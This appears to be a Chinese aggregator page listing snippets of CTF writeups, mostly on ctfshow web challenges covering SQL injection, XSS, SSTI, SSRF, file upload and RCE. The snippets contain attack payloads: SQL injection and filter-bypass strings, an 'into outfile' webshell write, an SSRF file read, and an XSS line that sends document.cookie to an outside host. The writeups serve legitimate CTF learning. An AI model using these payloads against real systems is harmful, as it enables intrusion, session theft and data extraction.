WriteUp:CTFshow

ctfShow sql注入笔记

遇到了sql注入的题目,记录一下sqlmap使用过程一、手工注入测试1、简单的万能注入先测试一下用户名:admin')or1=1#/admin'and1=1#/admin'or1=1#/admin'and-1=-1....密码:123'结果没测出来,也没报错,一点反应都没有二、sqlmap工具扫描先用sqlmap跑一下,找出注入点1、将请求包写入1.txt,然后执行sqlmap-r1.txt--b
whatever`·2023-11-25 12:29

CTFShow SQL入门记录

CTFShowSQL入门记录入门级SQL注入,也作为一个学习记录吧,有150道题慢慢更新,也希望学到一些新姿势(只会用sqlmap一把梭的菜鸡)-u指定注入点–dbs跑库名–tables跑表名–columns跑字段名–dump枚举数据-D指定库-T指定表-C指定字段–random-agent每次访问切换请求头防ban–delay=1每次探测延时一秒防banweb171这里没有任何的过滤就直接常规查
paidx0·2023-11-25 12:59

CTFshow SQL

web171——常规操作~2'and1=1#2'and1=2#数据接口请求异常:parsererror2'and1=1--+回显正常,且爆出所有信息,说明“--+”其效果了。“#”这种注释方式不成功2'unionselect1,2,3---成功回显1,2,32'unionselect1,group_concat(table_name),3frominformation_schema.tablesw
王俊凯迷妹·2023-11-25 12:24

ctfshow_sql注入

文章目录WEB172WEB173WEB174web175web176WEB177总结web178web179web180web181web182_同上web183_where子句web184_右连接、内连接、having子句方法一方法二web185web186web187_md5绕过md5($password,true)的SQL注入问题web188_mysql弱比较web189-load_file
multi4·2023-11-25 12:53

ctfshow sql注入系列2

web183:代码这个就有点头大,数据库都要自己试,先把上一题的拿过来,不行倒反天罡试试,就就有了数据库的名字:ctfshow_user因为这个返回的只有1或0.那么就只能用脚本不断的去试,比如说看pass
九月一。·2023-11-25 12:21

CTFSHOW SQL注入篇(171-190)

文章目录无过滤171172173174175过滤176177178179180181182183184185|186187188189190无过滤前言下面几道无过滤的题都可以写入shell然后蚁剑连上后从数据库里面找,就统一写下做法,后面不在具体复述。具体做法如下id=0'unionselect1,""intooutfile"/var/www/html/1.php%23"有的是查询的三项所以pay
yu22x·2023-11-25 12:21

CTFSHOW SQL注入篇(191-210)

文章目录191192193|194195196197|198|199|200201202203204205|206206207208209210191把190脚本里面的ascii改成ord即可#author:yu22ximportrequestsimportstringurl="http://eb1ea450-7ad8-4a93-a682-4cdb5cf1adff.challenge.ctf.sh
yu22x·2023-11-25 12:21

CTFSHOW SQL注入篇(211-230)

文章目录211212213214215216217218219220221222223224225-230225226227228|229|230211在上题的基础上加了个空格过滤,再稍微改改刚才的脚本fromlib.core.compatimportxrangefromlib.core.enumsimportPRIORITYimportbase64__priority__=PRIORITY.LO
yu22x·2023-11-25 12:21

ctfshow sql注入系列1

这个系列题有点多,就10个一篇文章目录web171:web172:web173:web174:web175:web176:web177:web178:web179:web180:web181:web182:web171:仔细观察这个查询语句,发现有一个username!='flag',他不让我干什么,我就干什么,我给他一个拼接是id传入$sql="selectusername,passwordfr
九月一。·2023-11-25 12:51

ctfshow SQL注入Web175

查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user5whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif(!preg_match('/[\x00-\x7f]/i',json_encode($ret))){$ret['msg']
墨言ink·2023-11-25 12:20

ctfshow sql注入171-187

sqli借此机会多学点sql语句,看看别人的语句是否奇妙web171$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号注入1ortrue%23#url编码web1721'orderby2--+//表-1'unionselect1,(selectgroup_conc
1-1A0·2023-11-25 12:20

CTFshow sql注入 上篇(web221-253)

`目录前言题目web221(limit注入)web222(groupby注入)web223(groupby注入)web224(文件名注入)web225(堆叠注入)解法一(handle)解法二(预编译)web226,web228-web230(堆叠注入)web227(堆叠注入)web231(update注入)解法1解法2web232(update注入)web233(update注入)web234(u
Kradress·2023-11-25 12:47

ctfshow 文件上传 151-161

文件上传也好久没做了。。手很生了151前端绕过只能上传png文件使用bp抓包,修改文件名后缀为php上传成功,发现文件上传路径使用蚁剑连接找到flag152152后端校验跟上一关一样@表示后面即使执行错误,也不报错抓包修改文件后缀名蚁剑153.user.ini绕过php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.use
木…·2023-11-25 12:16

ctfshow sql

180过滤%23%23被过滤,没办法注释了,还可以用’1’='1来闭合后边。或者使用--%0c--1'%0corder%0cby%0c3--%0c--1'%0cunion%0cselect%0c1,2,database()--%0c--1'%0cunion%0cselect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0c
木…·2023-11-25 11:43

Vulnhub DC-9靶场WriteUP

Recon首先使用netdiscover扫描靶机,靶机IP地址为192.168.244.135。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.244.0/24Currentlyscanning:192.168.244.0/24|ScreenView:UniqueHosts4CapturedARPReq/Reppackets,from4hosts.Tot
柠檬糖做柠檬汁·2023-11-23 11:21

CTFSHOW-PHP特性

WEB89题目://里面的一般默认加引号,数字可以不用区别,但是字符串需要不然会报错但是不影响运行例如Warning:Useofundefinedconstantb-assumed'b'(thiswillthrowanErrorinafutureversionofPHP)in/Applications/phpstudy/WWW/test.phponline5string(3)"xxx"string
_Monica_·2023-11-23 05:15

一些RCE的汇总

RCE自增RCE参考[CTFshow-RCE极限大挑战官方wp]RCE-1[过滤.(]RCE-2p[自增-Array]RCE-3[自增-NAN-过滤了(和.
有点水啊·2023-11-23 05:41

【Web】preg_match绕过相关例题wp

目录①[FBCTF2019]rceservice②[ctfshow]web130③[ctfshow]web131④[NISACTF2022]middlerce简单回顾一下基础参考文章p牛神文preg_match
Z3r4y·2023-11-23 04:32

新Bugku——Simple_SSTI_1——web

网上有很多的writeup,但我决定也写个,所以作为菜鸟的我如果有什么错的,希望大佬们喷轻点,先谢谢了好了回到题目里,首先打开是要求我们传一个参数flag进去我们打开源代码看一下(F12或ctrl+u)
来碗面加个小孩·2023-11-22 19:18

CTFSHOW】web入门 SSTI(更新中)

文章目录引言web361web362web363参考资料引言刷完SSRF、XSS,来学学SSTIweb361首先测试出get的参数名为:name。记得之前刷题时保存过一张大佬总结的测试流程图:根据图片规则进行测试:?name={{1*'4'}}返回结果:4则题目考察的很有可能是基于Jinja2的flask框架。payload:对于python3:(题目使用的是python3)使用popen函数:?
TurkeyMan·2023-11-22 15:16

ctfshow刷题 [struts2]

目录一、Web279-S2-001二、Web280--S2-005三、Web281--s2-008四、Web301-代码审计五、Web302-代码审计六、Web303-代码审计七:网鼎杯:朱雀组开启靶机八、Xss九、Web78文件包含一、Web279-S2-001题目分析:如题s2-001是一个struts2命令执行漏洞编号一、判断网站是否基于Struts2的方法1、通过网页后缀来判断,如.do.
路向阳_·2023-11-22 15:46

【Web】Ctfshow Nodejs刷题记录

①web334②web335③web336④web337⑤web338⑥web339⑦web340⑧web341⑨web342-343⑩web344①web334进来是一个登录界面下载附件,简单代码审计表单传ctfshow123456
Z3r4y·2023-11-22 15:13

ctfshow XSS刷题总结

简介这次把爪牙伸到了xss嘿嘿嘿开始日咯!web316用xss平台怎么也爆不出。。。可能是姿势不对用最原始的方法吧在自己的服务器上写一个hack.phpdocument.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookieweb317今天学习了一款xss自动扫描的工具XSStrike似乎很好用的呢直接跑出
b1ue0cean·2023-11-22 15:42

CTFSHOW XSS漏洞

目录准备工作第316-333关详细说明316关317关318关319关320关-326关327关328关329关330关331关332-333关准备工作关于这个平台:CTFSHOW的XSS平台是这样的你每次提交后
貌美不及玲珑心,贤妻扶我青云志·2023-11-22 15:42

ctfshow-xss

316-326反射型期间有过滤script、img、空格、iframe的,不一一赘述,以下payload通316-326。存储型327因为要的是管理员cookie,收件人猜测填写admin,在邮件内容插入payload328管理员登录时,会看到所有用户的用户名和密码,只要注册一个带有xss代码的用户即可,当管理员访问该页面,就会执行在密码或者用户名插入payload都行,网站没有验证输入合法性。获
Vin0sen·2023-11-22 15:38

【Web】Ctfshow XSS刷题记录

目录反射型XSS①web316②web317-319③web320-322④web323-326存储型XSS①web327②web328③web329④web330⑤web331⑥web332-333反射型XSS①web316直接输入alert(1),能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。payload:wi
Z3r4y·2023-11-22 14:05

SWPU新生赛2021 Reverse部分WriteUp

我真没想到第一波我做re比misc多。。第一波放题简单的逻辑这个题缺条件,结果太多,初步晃一眼,如果不给个大概范围,能输出的结果应该是几万~几十万。当然因为做了其他的题,了解到“简单”系列基本都是大写,于是才做出来的。题目如下flag='xxxxxxxxxxxxxxxxxx'flag=flag[::-1]result=0foriinrange(0,len(flag)-1):s1=ord(flag[
是Mumuzi·2023-11-22 09:20

SquareCTF-2023 Web Writeups

官方wp:CTFtime.org/SquareCTF2023tasksandwriteupssandboxDescription:I“made”“a”“python”“sandbox”“”“”nc184.72.87.98008
Jay 17·2023-11-22 04:37

ctfshow 摆烂杯web wp

考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题文章目录web签到黑客网站一行代码web签到题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破
Lum1n0us·2023-11-21 13:29

ctfshow终极考核wp

web640web641web642web643web644web645web646web647web648web649web650web651web652web653web654web640打开页面就能看到flagctfshow{060ae7a27d203604baeb125f939570ef}web641抓取首页的包,看到有一个Flag字段ctfshow
Lum1n0us·2023-11-21 13:29

BUUCTF笔记之Misc系列部分WriteUp(二)

1.爱因斯坦binwalk分离出一个压缩包。查看图片备注:解压得到flag。2.easycap追踪TCP流:3.另外一个世界binwalk和steg一无所获,图片备注也看了没有收获,winhex看看:复制出来转字符串得到:4.隐藏的钥匙路飞一行人千辛万苦来到了伟大航道的终点,找到了传说中的Onepiece,但是需要钥匙才能打开OnePiece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙
KogRow·2023-11-21 10:02

CTFHub-Web-Web前置技能 WriteUp

HTTP协议一、请求方式  1.题目内容  2.解题思路  根据题目内容描述,我们需要使用CTFHUB方法访问该网址,直接使用浏览器F12开发者工具对请求进行修改并重发。  3.解题过程  根据解题思路,修改请求方式为CTFHUB  查看响应,CaptureTheFlag!二、302跳转  1.题目内容  2.解题思路  点击该链接,使用burpsuite抓包  3.解题过程  抓到包后repea
曾小健_0532·2023-11-21 09:36

2022年农信银网络安全竞赛3-2 ez_raw简单取证writeup

下载解压ez_raw,根据题意判断文件应为内存镜像,用volatility工具分析。1、扫描cmd命令行获得一串base64字符串volatility-f.\ez_raw--profile=Win7SP1x64cmdscan5oiR5Zyo5rWP6KeI5Zmo5LiK5LiL6L2955qE5Lic6KW/5om+5LiN5Yiw5LqG77yM6L+Z56C055S16ISR6buY6K6k
陈征·2023-11-20 22:03

【Web】Ctfshow SSTI刷题记录1

目录①web361362-无过滤②web363-过滤单双引号③web364-过滤单双引号和args④web365-过滤中括号[]、单双引号、args⑤web366-过滤单双引号、args、中括号[]、下划线⑦web367-过滤单双引号、args、中括号[]、下划线、os⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{⑨web369-过滤单双引号、args、中括号[]、下划线、
Z3r4y·2023-11-19 23:19

【Web】Ctfshow SSRF刷题记录1

核心代码解读curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取内容curl_close():会话关闭①web351post:url=http://127.0.0.1/flag.php或者url=file:///var/www/html/flag.php查看源码②web352-353前置知识:127.1会被解析成127.0.0.
Z3r4y·2023-11-19 15:02

【Web】文件包含+php伪协议例题wp

目录①[SWPUCTF2021新生赛]include②[SWPUCTF2021新生赛]PseudoProtocols③[BSidesCF2020]Hadabadday④文件包含一些姿势(摘自ctfshow
Z3r4y·2023-11-19 15:01

ctf PHP一句话木马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...

CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍一下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,
Byte DIY·2023-11-19 06:57

第六届浙江省大学生网络与信息安全竞赛 2023年 初赛/决赛 WEB方向 Writeup

-------------------【初赛】-------------------easyphp简单反序列化__debuginfo()魔术方法打印所需调试信息,反序列化时候执行!链子如下:BBB::__debuginfo()->CCC::__toString()->AAA::__call()EXP:cmd);return"done";}}classBBB{public$param1;public
Jay 17·2023-11-19 03:22

靶场Writeup(四) | 反序列化、命令执行、Tomcat、域渗透等漏洞组合到攻克域控

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-11-18 22:09

实战ATT&CK攻击链路--靶场Writeup(三)

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-11-18 22:39

CTFshow-PWN入门-前置基础-全篇

本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDAPro、exeinfope参考博客:T1ngSh0w的博客ctfshowpwn入门|雲流のLowestWorld
Jugg_xie·2023-11-17 05:32

[SUCTF 2019]EasySQL 1 Writeup(超级详细)

本文章是该系列的第三篇,同样涉及到基础sql注入原理。首先我们能看到的就是一个输入框,直接告诉了你注入点。做了一些简单的测试,直接过滤了from、union、extractvalue、PREPARE等关键字,回显提示:NONONO!前面的那道sql我还是讲的比较中规中矩,这道sql骚一点。先讲讲我的第一种玩法:首先手工盲注嘛,会发现连sleep等都全部过滤掉了,而且你输入数字的时候回显是:Arra
StevenOnesir·2023-11-17 01:28

newstarctf 2023 week2

官方wpNewStarCTF2023Week2官方WriteUpweb游戏高手控制台将gameScore=10000000flag{42643d45-9b46-40ae-b7b3-f7c3d4542d72
一个俗人纳·2023-11-16 14:24

NewStarCTF 2023 公开赛道 Week3

官方WPhttps://shimo.im/docs/QPMRxzGktzsZnzhz/readNewStarCTF2023Week3官方WriteUp.htmlCryptoRabin’sRSA参考博客:
Fab1an·2023-11-16 14:27

第十六届全国大学生信息安全竞赛 ——创新实践能力赛线上初赛------WP

相关wp链接:第十六届全国大学生信息安全竞赛初赛WriteupbyX1cT34m|小绿草信息安全实验室2023全国大学生信息安全竞赛AGCTF战队WP-腾讯云开发者社区-腾讯云2023年第十六届全国大学生信息安全竞赛能力赛部分
访白鹿·2023-11-16 14:50

CTF writeup:tomcat上传webshell后门

做了ZJUschool-bus的一个题目,给了链接,***:**,在IP加端口后面写入manager/html跳出让你输密码,网上找个弱口令尝试的py文件很快就可以解出来。tomcat:tomcat。后面进去了网站要往上传个后门,找了好多地方没找到后门,自己写暂时水平不够,后来终于找到了一个。https://scoperchiatore.wordpress.com/my-webshell/成功进入
samohyes·2023-11-16 09:02

第十五届全国大学生信息安全竞赛(ciscn初赛) 部分writeup

杂项的附件地址:https://share.weiyun.com/BZyngGSZCISCNwebEzpopmisceverlasting_nightez_usb问卷调查pwnlogin-nomalcrypto签到电台基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3webEzpopthinphp6.0.12LST反序列化链,www.zip给源码,test路由里面a参数反序列化利用链
z.volcano·2023-11-15 23:16

第十五届全国大学生信息安全竞赛部分WriteUp

理论题算上变一千五百多名,华东南二百多名,进不去了,WriteUp也不想上传了。
Tajang·2023-11-15 23:14

ctfshow SQL注入专题

哦对了,这篇文章还没写完,更新中...emmm又是好久没更新了...之后就在这里做个记录吧,有些新的思路可以做些分享web174看了一下,应该是有数字或者username=flag就不输出,主要是这个数字的限制有点烦,flag里面肯定是有数字的...网上的wp很多用的布尔盲注,不过我当时还是想直接注出来,还是有办法的。参考前面几道题,可以使用to_base64函数,对于一个字符而言,不管是数字还是
yink12138·2023-11-15 07:39

ctfshow刷题日记sql注入篇

web171没有任何过滤那应该在这张表里面,直接用1'or'1'='1即可拿到表单的所有信息(也可以直接查询)web172添加了限制条件,上面的不能用了,还是单引号闭合,直接联合查询最终payload:-1'unionselect1,(selectpasswordfromctfshow_user2whereusername=flag);--+或者直接爆他所有的内容。-1'unionselect1,
Yan9.·2023-11-15 07:39
上一页 2 3 4 5 6 7 8 9 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他